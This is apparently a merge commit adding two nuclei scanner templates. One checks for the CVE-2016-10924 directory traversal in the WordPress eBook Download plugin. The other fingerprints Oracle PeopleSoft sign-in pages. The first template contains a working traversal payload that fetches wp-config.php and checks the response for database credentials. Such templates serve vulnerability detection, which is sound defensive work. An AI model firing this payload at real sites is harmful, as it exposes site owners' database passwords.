Merge pull request #3201 from projectdiscovery/idealphase/master

Added CVE-2016-10924

cves/2016/CVE-2016-10924.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-10924
+
+info:
+  name: Wordpress eBook Download < 1.2 - Directory Traversal
+  author: idealphase
+  severity: high
+  description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
+    - https://www.exploit-db.com/exploits/39575
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10924
+  tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-panels/oracle-people-sign-in.yaml

@@ -0,0 +1,29 @@
+id: oracle-people-sign-in
+
+info:
+  name: Oracle Peoplesoft Sign-in
+  author: idealphase
+  severity: info
+  tags: oracle,panel
+  metadata:
+    shodan-query: http.title:"Oracle PeopleSoft Sign-in"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Oracle PeopleSoft Sign-in</title>'
+          - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"'
+        condition: or
+
+      - type: status
+        status:
+          - 200